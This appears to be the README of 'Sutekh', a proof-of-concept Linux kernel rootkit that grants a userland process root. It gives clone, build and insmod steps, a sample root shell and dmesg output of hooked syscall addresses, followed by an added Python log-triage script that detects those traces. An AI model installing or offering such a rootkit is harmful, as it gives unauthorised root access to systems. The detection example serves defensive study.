Sutekh
An example rootkit that gives a userland process root permissions
Tested on Linux kernel [4.19.62] & [4.15.0]
[INSTALL]
- Install the latest Linux headers for your kernel. Example (Debian): [apt install linux-headers-$(uname -r)]
- $ git clone https://github.com/PinkP4nther/Sutekh
- $ cd Sutekh && make
- $ gcc rootswitch.c -o rs
- $ sudo insmod sutekh.ko
[Run] $ ./rs
[Output example]
[pinky@mememachine Sutekh]$ ./rs
[!] Switch hit!
[mememachine Sutekh]# id
uid=0(root) gid=0(root) groups=0(root)
[mememachine Sutekh]# exit
[Remove] $ sudo rmmod sutekh
[Note] Check dmesg for kernel debug output!
[ 2217.810776] [?] SCT: [0xffffffff96400180]
[?] EXECVE: [0xffffffffc065b030]
[?] UMASK: [0xffffffffc065b000]
[ 2223.379218] [+] Giving r00t!
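[Detection example] The following triage script is an added example, not part of the Sutekh project. It scans kernel log text for the debug strings shown above and reports which logged addresses fall in module memory rather than the kernel image. The address ranges are an assumption (common x86_64 layout with KASLR), and the function names are hypothetical.

```python
import re

# Assumed x86_64 ranges (4-level paging, KASLR-enabled build); not from the page.
KERNEL_IMAGE = (0xffffffff80000000, 0xffffffffbfffffff)
MODULE_SPACE = (0xffffffffc0000000, 0xfffffffffeffffff)

# Strings in the format of the debug output quoted on this page.
GRANT_MARKER = "[+] Giving r00t!"
LABELLED_ADDR = re.compile(r"\[\?\]\s+(\w+):\s+\[(0x[0-9a-fA-F]{16})\]")

# The page's sample dmesg output, embedded so the example runs offline.
SAMPLE = (
    "[ 2217.810776] [?] SCT: [0xffffffff96400180]\n"
    "[?] EXECVE: [0xffffffffc065b030]\n"
    "[?] UMASK: [0xffffffffc065b000]\n"
    "[ 2223.379218] [+] Giving r00t!\n"
)


def region(addr):
    """Classify a kernel virtual address against the assumed layout."""
    if KERNEL_IMAGE[0] <= addr <= KERNEL_IMAGE[1]:
        return "kernel-image"
    if MODULE_SPACE[0] <= addr <= MODULE_SPACE[1]:
        return "module-space"
    return "other"


def triage(log_text):
    """Return labelled addresses, grant-marker count and an overall verdict."""
    addrs, grants = {}, 0
    for line in log_text.splitlines():
        # findall also copes with several labelled addresses on one line.
        for label, value in LABELLED_ADDR.findall(line):
            addrs[label] = region(int(value, 16))
        grants += line.count(GRANT_MARKER)
    in_module = sorted(l for l, r in addrs.items()
                       if l != "SCT" and r == "module-space")
    # Flag a logged syscall table next to module-resident addresses,
    # or any occurrence of the privilege-grant marker.
    suspicious = grants > 0 or ("SCT" in addrs and bool(in_module))
    return {"addresses": addrs, "module_space_labels": in_module,
            "grant_events": grants, "suspicious": suspicious}


if __name__ == "__main__":
    print(triage(SAMPLE))
```

Kernel log strings are controlled by the module author and easy to change or drop, so a clean result here does not show the module is absent.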